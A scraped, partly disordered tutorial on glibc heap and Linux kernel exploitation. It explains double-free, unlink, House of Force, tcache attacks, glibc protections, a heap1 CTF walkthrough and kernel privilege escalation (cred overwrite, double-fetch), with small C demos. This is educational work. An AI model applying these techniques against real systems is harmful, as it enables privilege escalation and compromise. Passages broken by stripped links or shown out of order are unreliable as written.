if it gets even bigger than the heap chunk, and
free
at the end, so it works to trigger those functions too - great for triggering hooks!).
Inputting something along the lines of %10000c into a format string vulnerability also triggers a chunk to be created
_int_malloc
falls back to esssentially using
mmap
to service the request).
TODO
Calling mtrim will consolidate fastbins (which makes sense, given the name malloc_trim). Unlikely to ever be useful, but please do let me know if you find a use for it!
When changing malloc options using mallopt, the fastbins are first consolidated. This is pretty useless, as mallopt is likely called once (if at all) in the program prelude before it does anything.
/* If this is a large request, consolidate fastbins before continuing [...]*/else{ idx =largebin_index (nb);if(atomic_load_relaxed (&av->have_fastchunks))malloc_consolidate (av);}
else if (atomic_load_relaxed (&av->have_fastchunks))
{
malloc_consolidate (av);
/* restore original bin index */
if (in_smallbin_range (nb))
idx = smallbin_index (nb);
else
idx = largebin_index (nb);
}
A is the NON_MAIN_ARENA flag, which is set when the chunk is not located in main_arena; we will get to Arenas in a later section, but in essence every created thread is provided a different arena (up to a limit) and chunks in these arenas have the A bit set
Fastbins are a singly-linked list of chunks. The point of these is that very small chunks are reused quickly and efficiently. To aid this, chunks of fastbin size do not consolidate (they are not absorbed into surrounding free chunks once freed).
A fastbin is a LIFO (Last-In-First-Out) structure, which means the last chunk to be added to the bin is the first chunk to come out of it. Glibc only keeps track of the HEAD, which points to the first chunk in the list (and is set to 0 if the fastbin is empty). Every chunk in the fastbin has an fd pointer, which points to the next chunk in the bin (or is 0 if it is the last chunk).
When a new chunk is freed, it's added at the front of the list (making it the head):
The fd of the newly-freed chunk is overwritten to point at the old head of the list
HEAD is updated to point to this new chunk, setting the new chunk as the head of the list
Let's have a visual demonstration (it will help)! Try out the following C program:
We get:
As you can see, the chunk a gets reassigned to chunk f, b to e and c to d. So, if we free() a chunk, there's a good chance our next malloc() - if it's of the same size - will use the same chunk.
It can be really confusing as to why we add and remove chunks from the start of the list (why not the end?), but it's really just the most efficient way to add an element. Let's say we have this fastbin setup:
In this case HEAD points to a, and a points onwards to b as the next chunk in the bin (because the fd field of a points to b). Now let's say we free another chunk c. If we want to add it to the end of the list like so:
We would have to update the fd pointer of b to point at c. But remember that glibc only keeps track of the first chunk in the list - it only has the HEAD stored. It has no information about the end of this list, which could be many chunks long. This means that to add c in at the end, it would first have to start at the head and traverse through the entire list until it got to the last chunk, then overwrite the fd field of the last chunk to point at c and make c the last chunk.
Meanwhile, if it adds at the HEAD:
All we need to do is:
Set the fd of c to point at a
This is easy, as a was the old head, so glibc had a pointer to it stored already
This has much less overhead!
For reallocating the chunk, the same principle applies - it's much easier to update HEAD to point to a by reading the fd of c than it is to traverse the entire list until it gets to the end.
Operations of the Other Bins
When a non-fast chunk is freed, it gets put into the Unsorted Bin. When new chunks are requested, glibc looks at all of the bins
If the requested chunk is large (of largebin size), with . We will get into the mechanisms of this at a later point, but essentially I lied earlier - fastbins do consolidate, but not on freeing!
Finally, we iterate through the chunks in the unsorted bin
If it is empty, we service the request through making the heap larger by , pushing the now-smaller top chunk to start at a higher memory address
If the requested size is equal to the size of the chunk in the bin, return the chunk
If it's smaller, split the chunk in the bin in two and return a portion of the correct size
If it's larger, we , and after this there may be free chunks big enough to service the request
If not, we again service the request by and pushing the now-smaller top chunk to start at a higher memory address
One thing that is very easy to forget is what happens on allocation and what happens on freeing, as it can be a bit counter-intuitive. For example, the fastbin consolidation is triggered from an allocation!
The Top Chunk and Remainder
Creating more heap space
Also known as the wilderness, the top chunk is the final chunk in the heap. The size of the top chunk is equal to the size of the free heap space.
[TODO image here]
If a new chunk is allocated and there are no free chunks suitable, the top chunk shrinks and is pushed back to make space for the new heap. The use of the top is triggered here, and the actual logic can be found here:
If the size of the requested chunk is less than or equal to the size of the top chunk, it is broken into two chunks - the return chunk (located where the top chunk was previously) and the remainder chunk, which is the new top chunk with a reduced size.
If the size is greater than the top chunk can handle, glibc attempts to consolidate fastbins. If there are no fastbins (or there's still not enough space), we , which calls (on systems that have it).
Double-Free
Overview
A double-free can take a bit of time to understand, but ultimately it is very simple.
Firstly, remember that for fast chunks in the fastbin, the location of the next chunk in the bin is specified by the fd pointer. This means if chunk a points to chunk b, once chunk a is freed the next chunk in the bin is chunk b.
In a double-free, we attempt to controlfd. By overwriting it with an arbitrary memory address, we can tell malloc()where the next chunk is to be allocated. For example, say we overwrote a->fd to point at 0x12345678; once a is free, the next chunk on the list will be 0x12345678.
Controlling fd
As it sounds, we have to free the chunk twice. But how does that help?
Let's watch the progress of the fastbin if we free an arbitrary chunk a twice:
Fairly logical.
But what happens if we called malloc() again for the same size?
Well, strange things would happen. a is both allocated (in the form of b) and free at the same time.
If you remember, the heap attempts to save as much space as possible and when the chunk is free the fd pointer is written where the user data used to be.
But what does this mean?
When we write into the use data of b, we're writing into the fd of aat the same time.
And remember - controlling fd means we can control where the next chunk gets allocated!
So we can write an address into the data of b, and that's where the next chunk gets placed.
Now, the next alloc will return aagain. This doesn't matter, we want the one afterwards.
Boom - an arbitrary write.
Freeing Chunks and the Bins
An Overview of Freeing
When we are done with a chunk's data, the data is freed using a function such as free(). This tells glibc that we are done with this portion of memory.
In the interest of being as efficient as possible, glibc makes a lot of effort to recycle previously-used chunks for future requests in the program. As an example, let's say we need 100 bytes to store a string input by the user. Once we are finished with it, we tell glibc we are no longer going to use it. Later in the program, we have to input another 100-byte string from the user. Why not reuse that same part of memory? There's no reason not to, right?
It is the bins that are responsible for the bulk of this memory recycling. A bin is a (doubly- or singly-linked) list of free chunks. For efficiency, different bins are used for different sizes, and the operations will vary depending on the bins as well to keep high performance.
When a chunk is freed, it is "moved" to the bin. This movement is not physical, but rather a pointer - a reference to the chunk - is stored somewhere in the list.
Bin Operations
There are four bins: fastbins, the unsorted bin, smallbins and largebins.
When a chunk is freed, the function that does the bulk of the work in glibc is . I won't delve into the source code right now, but will provide hyperlinks to glibc 2.3, a very old one without security checks. You should have a go at familiarising yourself with what the code says, but bear in mind things have been moved about a bit to get to there they are in the present day! You can change the version on the left in bootlin to see how it's changed.
First, . If it is less than the largest fastbin size,
Otherwise, if it's mmapped,
Finally, and
What is consolidation? We'll be looking into this more concretely later, but it's essentially the process of finding other free chunks around the chunk being freed and combining them into one large chunk. This makes the reuse process more efficient.
Fastbins
Fastbins store small-sized chunks. There are 10 of these for chunks of size 16, 24, 32, 40, 48, 56, 64, 72, 80 or 88 bytes including metadata.
Unsorted Bin
There is only one of these. When small and large chunks are freed, they end of in this bin to speed up allocation and deallocation requests.
Essentially, this bin gives the chunks one last shot at being used. Future malloc requests, if smaller than a chunk currently in the bin, split up that chunk into two pieces and return one of them, speeding up the process - this is the . If the chunk requested is larger, then the chunks in this bin get moved to the respective Small/Large bins.
Small Bins
There are 62 small bins of sizes 16, 24, ... , 504 bytes and, like fast bins, chunks of the same size are stored in the same bins. Small bins are doubly-linked and allocation and deallocation is FIFO.
The purpose of the FD and BK pointers as we saw before are to points to the chunks ahead and behind in the bin.
Before ending up in the unsorted bin, contiguous small chunks (small chunks next to each other in memory) can coalesce (consolidate), meaning their sizes combine and become a bigger chunk.
Large Bins
63 large bins, can store chunks of different sizes. The free chunks are ordered in decreasing order of size, meaning insertions and deletions can occur at any point in the list.
The first 32 bins have a range of 64 bytes:
Like small chunks, large chunks can coalesce together before ending up in the unsorted bin.
Head and Tail
Each bin is represented by two values, the HEAD and TAIL. As it sounds, HEAD is at the top and TAIL at the bottom. Most insertions happen at the HEAD, so in LIFO structures (such as the fastbins) reallocation occurs there too, whereas in FIFO structures (such as small bins) reallocation occurs at the TAIL. For fastbins, the TAIL is null.
The Tcache
New and efficient heap management
Starting in , a new heap feature called the tcache was released. The tcache was designed to be a performance booster, and the operation is very simple: every chunk size (up to size 0x410) has its own tcache bin, which can store up to 7 chunks. When a chunk of a specific size is allocated, the tcache bin is searched first. When it is freed, the chunk is added to the tcache bin; if it is full, it then goes to the standard fastbin/unsortedbin.
The tcache bin acts like a fastbin - it is a singly-linked list of free chunks of a specific size. The handling of the list, using fd pointers, is identical. As you can expect, the attacks on the tcache are also similar to the attacks on fastbins.
Ironically, years of defenses that were implemented into the fastbins - such as the - were ignored in the initial implementation of the tcache. This means that using the heap to attack a binary running under glibc 2.27 binary is easier than one running under 2.25!
Unlink Exploit
Overview
When a chunk is removed from a bin, unlink() is called on the chunk. The unlink macro looks like this:
Note how fd and bk are written to location depending on fd
struct malloc_chunk {
INTERNAL_SIZE_T mchunk_prev_size; /* Size of previous chunk (if free). */
INTERNAL_SIZE_T mchunk_size; /* Size in bytes, including overhead. */
struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;
/* Only used for large blocks: pointer to next larger size. */
struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
struct malloc_chunk* bk_nextsize;
};
Tcache poisoning is a fancy name for a double-free in the tcache chunks.
Use-After-Free
Much like the name suggests, this technique involves us using data once it is freed. The weakness here is that programmers often wrongly assume that once the chunk is freed it cannot be used and don't bother writing checks to ensure data is not freed. This means it is possible to write data to a free chunk, which is very dangerous.
TODO: binary
Tcache: calloc()
HEAD is then updated to c, making it the head of the list
This is also easy, as the pointer to c is freely available
We want to write the value 0x1000000c to 0x5655578c. If we had the ability to create a fake free chunk, we could choose the values for fd and bk. In this example, we would set fd to 0x56555780 (bear in mind the first 0x8 bytes in 32-bit would be for the metadata, so P->fd is actually 8 bytes off P and P->bk is 12 bytes off) and bk to 0x10000000. Then when we unlink() this fake chunk, the process is as follows:
This may seem like a lot to take in. It's a lot of seemingly random numbers. What you need to understand is P->fd just means 8 bytes off P and P->bk just means 12 bytes off P.
If you imagine the chunk looking like
Then the fd and bk pointers point at the start of the chunk - prev_size. So when overwriting the fd pointer here:
FD points to 0x56555780, and then 0xc gets added on for bk, making the write actually occur at 0x5655578c, which is what we wanted. That is why we fake fd and bk values lower than the actual intended write location.
In 64-bit, all the chunk data takes up 0x8 bytes each, so the offsets for fd and bk will be 0x10 and 0x18 respectively.
The slight issue with the unlink exploit is not only does fd get written to where you want, bk gets written as well - and if the location you are writing either of these to is protected memory, the binary will crash.
Protections
More modern libc versions have a different version of the unlink macro, which looks like this:
Here unlink() check the bk pointer of the forward chunk and the fd pointer of the backward chunk and makes sure they point to P, which is unlikely if you fake a chunk. This quite significantly restricts where we can write using unlink.
heap1
http://exploit.education/phoenix/heap-one/
Source
Analysis
This program:
Allocates a chunk on the heap for the heapStructure
Allocates another chunk on the heap for the name of that heapStructure
Regular Execution
Let's break on and after the first strcpy.
As we expected, we have two pairs of heapStructure and name chunks. We know the strcpy will be copying into wherever name points, so let's read the contents of the first heapStructure. Maybe this will give us a clue.
Look! The name pointer points to the name chunk! You can see the value 0x602030 being stored.
This isn't particularly a revelation in itself - after all, we knew there was a pointer in the chunk. But now we're certain, and we can definitely overwrite this pointer due to the lack of bounds checking. And because we can also control the value being written, this essentially gives us an arbitrary write!
And where better to target than the GOT?
Exploitation
The plan, therefore, becomes:
Pad until the location of the pointer
Overwrite the pointer with the GOT address of a function
Set the second parameter to the address of winner
But what function should we overwrite? The only function called after the strcpy is printf, according to the source code. And if we overwrite printf with winner it'll just recursively call itself forever.
Luckily, compilers like gcc compile printf as puts if there are no parameters - we can see this with radare2:
So we can simply overwrite the GOT address of puts with winner. All we need to find now is the padding until the pointer and then we're good to go.
Break on and after the strcpy again and analyse the second chunk's name pointer.
The pointer is originally at 0x8d9050; once the strcpy occurs, the value there is 0x41415041414f4141.
The offset is 40.
Final Exploit
Again, null bytes aren't allowed in parameters so you have to remove them.
Double-Free Protections
It wouldn't be fun if there were no protections, right?
Using Xenial Xerus, try running:
#include <stdio.h>
#include <stdlib.h>
int main() {
int *a = malloc(0x50);
free(a);
free(a);
return 1;
}
Notice that it throws an error.
Double Free or Corruption (Fasttop)
Is the chunk at the top of the bin the same as the chunk being inserted?
For example, the following code still works:
malloc(): memory corruption (fast)
When removing the chunk from a fastbin, make sure the size falls into the fastbin's range
The previous protection could be bypassed by freeing another chunk in between the double-free and just doing a bit more work that way, but then you fall into this trap.
Namely, if you overwrite fd with something like 0x08041234, you have to make sure the metadata fits - i.e. the size ahead of the data is completely correct - and that makes it harder, because you can't just write into the GOT, unless you get lucky.
The House of Force
Exploiting the wilderness
Glibc Version
*-
Primitive Required
Heap overflow into the top chunk
Chunk allocation of arbitrary size
Primitive Gained
Arbitrary Write
In the House of Force, we overflow the size field of the top chunk with a huge value. We next allocate a huge chunk size. Due to the size overwrite, we bypass the top size check:
Because the check is passed, the we trick glibc into allocating the large request to the heap rather than use mmap(). This gives us a lot of control over the remainder chunk:
Note that if we can control the allocation size (the nb variable here), we pass that size to :
This macro takes the address and adds nb onto it - but because we have control over nb, we can control where the remainder chunk is placed, and therefore where the next top chunk is located. This means that the next allocation can be located at an address of our choice!
Note that we can even write to addresses ahead of the heap in memory by triggering an integer overflow!
TODO mathematics
TODO source
TODO patch
The Patch
In glibc 2.29, there is a to protect against the House of Force:
Very simple - check if the size is ridiculously large, and throw an error if so.
Safe Linking
Starting from glibc 2.32, a new Safe-Linking mechanism was implemented to protect the singly-linked lists (the fastbins and tcachebins). The theory is to protect the fd pointer of free chunks in these bins with a mangling operation, making it more difficult to overwrite it with an arbitrary value.
Here, pos is the location of the current chunk and ptr the location of the chunk we are pointing to (which is NULL if the chunk is the last in the bin). Once again, we are using ASLR to protect! The >>12 gets rid of the predictable last 12 bits of ASLR, keeping only the random upper 52 bits (or effectively 28, really, as the upper ones are pretty predictable):
It's a very rudimentary protection - we use the current location and the location we point to in order to mangle it. From a programming standpoint, it has virtually no overhead or performance impact. We can see that PROTECT_PTR has been implemented in and two locations in _int_free() (for fastbins) and . You can find REVEAL_PTR used as well.
So, what does this mean to an attacker?
Again, heap leaks are key. If we get a heap leak, we know both parts of the XOR in PROTECT_PTR, and we can easily recreate it to fake our own mangled pointer.
It might be tempting to say that a partial overwrite is still possible, but there is a new security check that comes along with this Safe-Linking mechanism, the alignment check. This check ensures that chunks are 16-bit aligned and is only relevant to singly-linked lists (like all of Safe-Linking). A quick Ctrl-F for unaligned in will bring up plenty of different locations. The most important ones for us as attackers is probably the one in tcache_get() and the ones in _int_malloc().
When trying to get a chunk eout of the tcache, alignment is checked.
There are three checks here. First on , the macro for removing a chunk from a fastbin:
Once on :
And lastly on every fastbin chunk during the :
_int_free() checks the alignment if the tcache_entry
You may notice some of them use while others use .
The macros are defined side-by-side, but really aligned_OK is for addresses while misaligned_chunk is for chunks.
is defined as such:
is defined for i386 as 16. In binary that's 10000, so MALLOC_ALIGN_MASK is 1111, so the final byte is checked. This results in 16-bit alignment, as expected.
This alignment check means you would have to guess 16 bits of entropy, leading to a 1/16 chance if you attempt to brute-force the last 16 bits to be
The Malloc Maleficarum
The first heap exploits
In 2001, two of the most famous heap exploitation papers were printed in the famous Phrack magazine - Vudo malloc tricks and Once upon a free(). These are some of the very first heap exploitation techniques published, covering some of the ones you have read about previously.
In late 2004, glibc was hardened, and this rendered these exploits obsolete. The next famous heap exploitation paper was The Malloc Maleficarum in 2005, which documents a collection of techniques sorted into Houses:
The House of Prime
The House of Mind
The House of Force
The House of Lore
The House of Spirit
The House of Chaos
Each of these had its own unique spin. In keeping with this tradition, modern heap exploits are often nicknamed as their own House, such as the .
The original houses are the cornerstone of modern heap exploitation, and while they're no longer possible, they were until more recently that you'd think. They are also important to understand to build up your knowledge.
Double-Free Exploit
Still on Xenial Xerus, means both mentioned checks are still relevant. The bypass for the second check (malloc() memory corruption) is given to you in the form of fake metadata already set to a suitable size. Let's check the (relevant parts of) the source.
The fakemetadata variable is the fake size of 0x30, so you can focus on the double-free itself rather than the protection bypass. Directly after this is the admin variable, meaning if you pull the exploit off into the location of that fake metadata, you can just overwrite that as proof.
users is a list of strings for the usernames, and userCount keeps track of the length of the array.
main_loop()
Prompts for input, takes in input. Note that main() itself prints out the location of fakemetadata, so we don't have to mess around with that at all.
createUser()
createUser() allocates a chunk of size 0x20 on the heap (real size is 0x30 including metadata, hence the fakemetadata being 0x30) then sets the array entry as a pointer to that chunk. Input then gets written there.
deleteUser()
Get index, print out the details and free() it. Easy peasy.
complete_level()
Checks you overwrote admin with admin, if you did, mission accomplished!
Exploitation
There's literally no checks in place so we have a plethora of options available, but this tutorial is about using a double-free, so we'll use that.
Setup
First let's make a skeleton of a script, along with some helper functions:
Finding the Double-Free
As we know with the fasttop protection, we can't allocate once then free twice - we'll have to free once inbetween.
Let's check the progression of the fastbin by adding a pause() after every delete(). We'll hook on with radare2 using
delete(0) #1
Due to its size, the chunk will go into Fastbin 2, which we can check the contents of using dmhf 2 (dmhf analyses fastbins, and we can specify number 2).
Looks like the first chunk is located at 0xd58000. Let's keep going.
delete(1)
The next chunk (Chunk 1) has been added to the top of the fastbin, this chunk being located at 0xd58030.
delete(0) #2
Boom - we free Chunk 0 again, adding it to the fastbin for the second time. radare2 is nice enough to point out there's a double-free.
Writing to the Fastbin Freelist
Now we have a double-free, let's allocate Chunk 0 again and put some random data. Because it's also considered free, the data we write is seen as being in the fd pointer of the chunk. Remember, the heap saves space, so fd when free is located exactly where data is when allocated (probably explained better ).
So let's write to fd, and see what happens to the fastbin. Remove all the pause() instructions.
Run, debug, and dmhf 2.
The last free() gets reused, and our "fake" fastbin location is in the list. Beautiful.
Let's push it to the top of the list by creating two more irrelevant users. We can also parse the fakemetadata location at the beginning of the exploit chain.
The reason we have to subtract 8 off fakemetadata is that the only thing we faked in the souce is the size field, but prev_size is at the very front of the chunk metadata. If we point the fastbin freelist at the fakemetadata variable it'll interpret it as prev_size and the 8 bytes afterwards as size, so we shift it all back 8 to align it correctly.
Now we can control where we write, and we know where to write to.
Getting the Arbitrary Write
First, let's replace the location we write to with where we want to:
Now let's finish it off by creating another user. Since we control the fastbin, this user gets written to the location of our fake metadata, giving us an almost arbitrary write.
The 8 null bytes are padding. If you read the source, you notice the metadata string is 16 bytes long rather than 8, so we need 8 more padding.
Awesome - we completed the level!
Final Exploit
32-bit
Mixing it up a bit - you can try the 32-bit version yourself. Same principle, offsets a bit different and stuff. I'll upload the binary when I can, but just compile it as 32-bit and try it yourself :)
The kernel is the program at the heart of the Operating System. It is responsible for controlling every aspect of the computer, from the nature of syscalls to the integration between software and hardware. As such, exploiting the kernel can lead to some incredibly dangerous bugs.
In the context of CTFs, Linux kernel exploitation often involves the exploitation of kernel modules. This is an integral feature of Linux that allows users to extend the kernel with their own code, adding additional features.
You can find an excellent introduction to Kernel Drivers and Modules by LiveOverflow here, and I recommend it highly.
Kernel Modules
Kernel Modules are written in C and compiled to a .ko (Kernel Object) format. Most kernel modules are compiled for a specific version kernel version (which can be checked with uname -r, my Xenial Xerus is 4.15.0-128-generic). We can load and unload these modules using the insmod and rmmod commands respectively. Kernel modules are often loaded into /dev/* or /proc/. There are 3 main module types: Char, Block and Network.
Char Modules
Char Modules are deceptively simple. Essentially, you can access them as a stream of bytes - just like a file - using syscalls such as open. In this way, they're virtually almost dynamic files (at a super basic level), as the values read and written can be changed.
Examples of Char modules include /dev/random.
I'll be using the term module and device interchangeably. As far as I can tell, they are the same, but please let me know if I'm wrong!
Kernel ROP - Stack Pivoting
While the kernel cannot execute code in userland, it can set its RSP to a userland location, so it is possible to stack pivot to userland as long as all of the gadgets used are in kernel space.
I don't think an example is necessary for this.
#include <stdio.h>
#include <stdlib.h>
int main() {
int *a = malloc(0x50);
int *b = malloc(0x50);
free(a);
free(b);
free(a);
return 1;
}
If ret2usr is analogous to ret2shellcode, then SMEP is the new NX. SMEP is a primitive protection that ensures any code executed in kernel mode is located in kernel space, and it does this based on the User/Supervisor bit in page tables. This means a simple ROP back to our own shellcode no longer works. To bypass SMEP, we have to use gadgets located in the kernel to achieve what we want to (without switching to userland code).
In older kernel versions we could use ROP to disable SMEP entirely, but this has been patched out. This was possible because SMEP is determined by the 20th bit of the CR4 register, meaning that if we can control CR4 we can disable SMEP from messing with our exploit.
We can enable SMEP in the kernel by controlling the respective QEMU flag (qemu64 is not notable):
-cpu qemu64,+smep
Sometimes it will be enabled by default, in which case you need to us nosmep.
is already set to the value it's meant to be and it has to do a whole double-free iteration check:
if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx]; tmp; tmp = REVEAL_PTR (tmp->next))
{
if (__glibc_unlikely (!aligned_OK (tmp)))
malloc_printerr ("free(): unaligned chunk detected in tcache 2");
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
}
Repeats the process with another heapStructure
Copies the two command-line arguments to the name variables of the heapStructures
Prints something
Next time the function is called, it will call winner
Creating an interactive char driver is surprisingly simple, but there are a few traps along the way.
Exposing it to the File System
This is by far the hardest part to understand, but honestly a full understanding isn't really necessary. The new intro_init function looks like this:
A major number is essentially the unique identifier to the kernel module. You can specify it using the first parameter of register_chrdev, but if you pass 0 it is automatically assigned an unused major number.
We then have to register the class and the device. In complete honesty, I don't quite understand what they do, but this code exposes the module to /dev/intro.
Note that on an error it calls class_destroy and unregister_chrdev:
Cleaning it Up
These additional classes and devices have to be cleaned up in the intro_exit function, and we mark the major number as available:
Controlling I/O
In intro_init, the first line may have been confusing:
The third parameter fops is where all the magic happens, allowing us to create handlers for operations such as read and write. A really simple one would look something like:
The parameters to intro_read may be a bit confusing, but the 2nd and 3rd ones line up to the 2nd and 3rd parameters for the read() function itself:
We then use the function copy_to_user to write QWERTY to the buffer passed in as a parameter!
Full Code
Simply use sudo insmod to load it, .
Testing The Module
Create a really basic exploit.c:
If the module is successfully loaded, the read() call should read QWERTY into buffer:
Success!
Writing a Char Module
The Code
Writing a Char Module is suprisingly simple. First, we specify what happens on init (loading of the module) and exit (unloading of the module). We need some special headers for this.
It looks simple, because it is simple. For now, anyway.
First we set the license, because otherwise we get a warning, and I hate warnings. Next we tell the module what to do on load (intro_init()) and unload (intro_exit()). Note we put parameters as void, this is because kernel modules are very picky about (even if just void).
We then register the purposes of the functions using module_init() and module_exit().
Note that we use printk rather than printf. GLIBC doesn't exist in kernel mode, and instead we use C's in-built kernel functionality. KERN_ALERT is specifies the type of message sent, and .
Compiling
Compiling a Kernel Object can seem a little more complex as we use a , but it's surprisingly simple:
$(MAKE) is a special flag that effectively calls make, but it propagate all same flags that ourMakefile was called with. So, for example, if we call
Then $(MAKE) will become make -j 8. Essentially, $(MAKE) is make, which compiles the module. The files produced are defined at the top as obj-m. Note that compilation is unique per kernel, which is why the compiling process uses your unique kernel build section.
Using the Kernel Module
Now we've got a ko file compiled, we can add it to the list of active modules:
If it's successful, there will be no response. But where did it print to?
Remember, the kernel program has no concept of userspace; it does not know you ran it, nor does it bother communicating with userspace. Instead, this code runs in the kernel, and we can check the output using sudo dmesg.
Here we grab the last line using tail - as you can see, our printk is called!
Now let's unload the module:
And there our intro_exit is called.
You can view currently loaded modules using the lsmod command
Tcache Keys
A primitive double-free protection
Starting from glibc 2.29, the tcache was hardened by the addition of a second field in the tcache_entry struct, the key:
It's a pointer to a tcache_perthread_struct. In the tcache_put() function, we can see what key is set to:
When a chunk is freed and tcache_put() is called on it, the key field is set to the location of the tcache_perthread_struct. Why is this relevant? Let's check the tcache security checks in _int_free():
The chunk being freed is variable e. We can see here that before tcache_put() is called on it, there is a check being done:
The check determines whether the key field of the chunk e is set to the address of the tcache_perthread_struct already. Remember that this happens when it is put into the tcache with tcache_put()! If the pointer is already there, there is a very high chance that it's because the chunk has already been freed, in which case it's a double-free!
It's not a 100% guaranteed double-free though - as the comment above it says:
This test succeeds on double free. However, we don't 100% trust it (it also matches random payload data at a 1 in 2^<size_t> chance), so verify it's not an unlikely coincidence before aborting.
There is a 1/2^<size_t> chance that the key being tcache_perthread_struct already is a coincidence. To verify, it simply iterates through the tcache bin and compares the chunks to the one being freed:
Iterates through each entry, calls it tmp and compares it to e. If equal, it detected a double-free.
You can think of the key as an effectively random value (due to ASLR) that gets checked against, and if it's the correct value then something is suspicious.
So, what can we do against this? Well, this protection doesn't affect us that much - it stops a simple double-free, but if we have any kind of UAF primitive we can easily overwrite e->key. Even with a single byte, we still have a 255/256 chance of overwriting it to something that doesn't match key. Creating fake tcache chunks doesn't matter either, as even in the latest glibc version there is , meaning tcache poisoning is still doable.
In fact, the key can even be helpful for us - the fd pointer of the tcache chunk is mangled, so a UAF does not guarantee a heap leak. The key field is not mangled, so if we can leak the location of tcache_perthread_struct instead, this gives us a heap leak as it is always located at heap_base + 0x10.
In glibc 2.34, the key field was . Instead of tcache_put() setting key to the location of the tcache_perthread_struct, it sets it to :
Note the as well!
What is tcache_key? It's defined and set directly below, in the function:
It attempts to call __getrandom(), which is defined as a stub and for Linux ; it just uses a syscall to read n random bytes. If that fails for some reason, it calls the function instead, which generates a pseudo-random number seeded by the time. Long story short: tcache_key is random. The , and the operation is the same, just it's completely random rather than based on ASLR. As the comment above it says
The value of tcache_key does not really have to be a cryptographically secure random number. It only needs to be arbitrary enough so that it does not collide with values present in applications. [...]
This isn't a huge change - it's still only straight double-frees that are affected. We can no longer leak the heap via the key, however.
Interactivity with IOCTL
A more useful way to interact with the driver
Linux contains a syscall called ioctl, which is often used to communicate with a driver. ioctl() takes three parameters:
File Descriptor fd
an unsigned int
an unsigned long
The driver can be adapted to make the latter two virtually anything - perhaps a pointer to a struct or a string. In the driver source, the code looks along the lines of:
But if you want, you can interpret cmd and arg as pointers if that is how you wish your driver to work.
To communicate with the driver in this case, you would use the ioctl() function, which you can import in C:
And you would have to update the file_operations struct:
On modern Linux kernel versions, . The former is the replacement for .ioctl, with the latter allowing 32-bit processes to perform ioctl calls on 64-bit systems. As a result, the new file_operations is likely to look more like this:
The Ultimate Aim of Kernel Exploitation - Process Credentials
Overview
Userspace exploitation often has the end goal of code execution. In the case of kernel exploitation, we already have code execution; our aim is to escalate privileges, so that when we spawn a shell (or do anything else) using execve("/bin/sh", NULL, NULL) we are dropped as root.
To understand this, we have a talk a little about how privileges and credentials work in Linux.
The cred struct
The contains all the permissions a task holds. The ones that we care about are typically these:
These fields are all unsigned int fields, and they represent what you would expect - the UID, GID, and a few other less common IDs for other operations (such as the FSUID, which is checked when accessing a file on the file system). As you can expect, overwriting one or more of these fields is likely a pretty desirable goal.
Note the __randomize_layout here at the end! This is a compiler flag that tells it to mix the layout up on each load, making it harder to target the structure!
task_struct
The kernel needs to store information about each running task, and to do this it uses the structure. Each kernel task has its own instance.
The task_struct instances are stored in a linked list, with a global kernel variable init_task pointing to the first one. Each task_struct then points to the next.
Along with linking data, the task_struct also (more importantly) stores real_cred and cred, which are both pointers to a cred struct. The difference between the two is explained :
In effect, real_cred is the initial credential of the process, and is used by processes acting on the process. cred is the current credential, used to define what the process is allowed to do. We have to keep track of both as some processes care about the initial cred and some about the updated.
An example of caring about the real_cred instead of cred is in of /proc/$PID/status, which displays the real_cred as the owner of a process, even if privileges are elevated (note that is a macro to grab real_cred, confusingly). Conversely, setuid executables will modify cred and not real_cred.
So, which set of credentials do we want to target with an arbitrary write? It will depend on what set is relevant for the purpose, but since you usually want to do be creating new processes (through system or execve), the cred is used. In some cases, real_cred will work too, because it seems as if the pointers (though note that this excerpt is not from process creation but , which is , so it could differ for new process creation).
prepare_kernel_cred() and commit_creds()
As an alternative to overwriting cred structs in the unpredictable kernel heap, we can call prepare_kernel_cred() to generate a new valid cred struct and commit_creds() to overwrite the real_cred and cred of the current task_struct.
prepare_kernel_cred()
The function can be found , but there's not much to say - it creates a new cred struct called new then . It returns new.
If NULL is passed as the argument, it will , which . This is very important, as it means that calling prepare_kernel_cred(0) results in a new set of root creds!
This last part is different on newer kernel versions - check out section!
commit_creds()
This function is found , but ultimately it will update task->real_cred and task->cred to the new credentials:
Resources and References
Double-Fetch
The most simple of vulnerabilities
A double-fetch vulnerability is when data is accessed from userspace multiple times. Because userspace programs will commonly pass parameters in to the kernel as pointers, the data can be modified at any time. If it is modified at the exact right time, an attacker could compromise the execution of the kernel.
A Vulnerable Kernel Module
Let's start with a convoluted example, where all we want to do is change the id that the module stores. We are not allowed to set it to 0, as that is the ID of root, but all other values are allowed.
The code below will be the contents of the read() function of a kernel. I've removed , but here are the relevant parts:
The program will:
Check if the ID we are attempting to switch to is 0
If it is, it doesn't allow us, as we attempted to log in as root
Sleep for 1 second (this is just to illustrate the example better, we will remove it later)
Simple Communication
Let's say we want to communicate with the module, and we set up a simple C program to do so:
We compile this statically (as there are no shared libraries on our VM):
As expected, the id variable gets set to 900 - we can check this in dmesg:
That all works fine.
Exploiting a Double-Fetch and Switching to ID 0
The flaw here is that creds->id is dereferenced twice. What does this mean? The kernel module is passed a reference to a Credentials struct:
This is a pointer, and that is perhaps the most important thing to remember. When we interact with the module, we give it a specific memory address. This memory address holds the Credentials struct that we define and pass to the module. The kernel does not have a copy - it relies on the user's copy, and goes to userspace memory to use it.
Because this struct is controlled by the user, they have the power to change it whenever they like.
The kernel module uses the id field of the struct on two separate occasions. Firstly, to check that the ID we wish to swap to is valid (not 0):
And once more, to set the id variable:
Again, this might seem fine - but it's not. What is stopping it from changing inbetween these two uses? The answer is simple: nothing. That is what differentiates userspace exploitation from kernel space.
A Proof-of-Concept: Switching to ID 0
Inbetween the two dereferences creds->id, there is a timeframe. Here, we have artificially extended it (by sleeping for one second). We have a race codition - the aim is to switch id in that timeframe. If we do this successfully, we will pass the initial check (as the ID will start off as 900), but by the time it is copied to id, it will have become 0 and we have bypassed the security check.
Here's the plan, visually, if it helps:
In the waiting period, we swap out the id.
If you are trying to compile your own kernel, you need CONFIG_SMP enabled, because we need to modify it in a different thread! Additionally, you need QEMU to have the flag -smp 2 (or more) to enable 2 cores, though it may default to having multiple even without the flag. This example may work without SMP, but that's because of the sleep - when we most onto part 2, with no sleep, we require multiple cores.
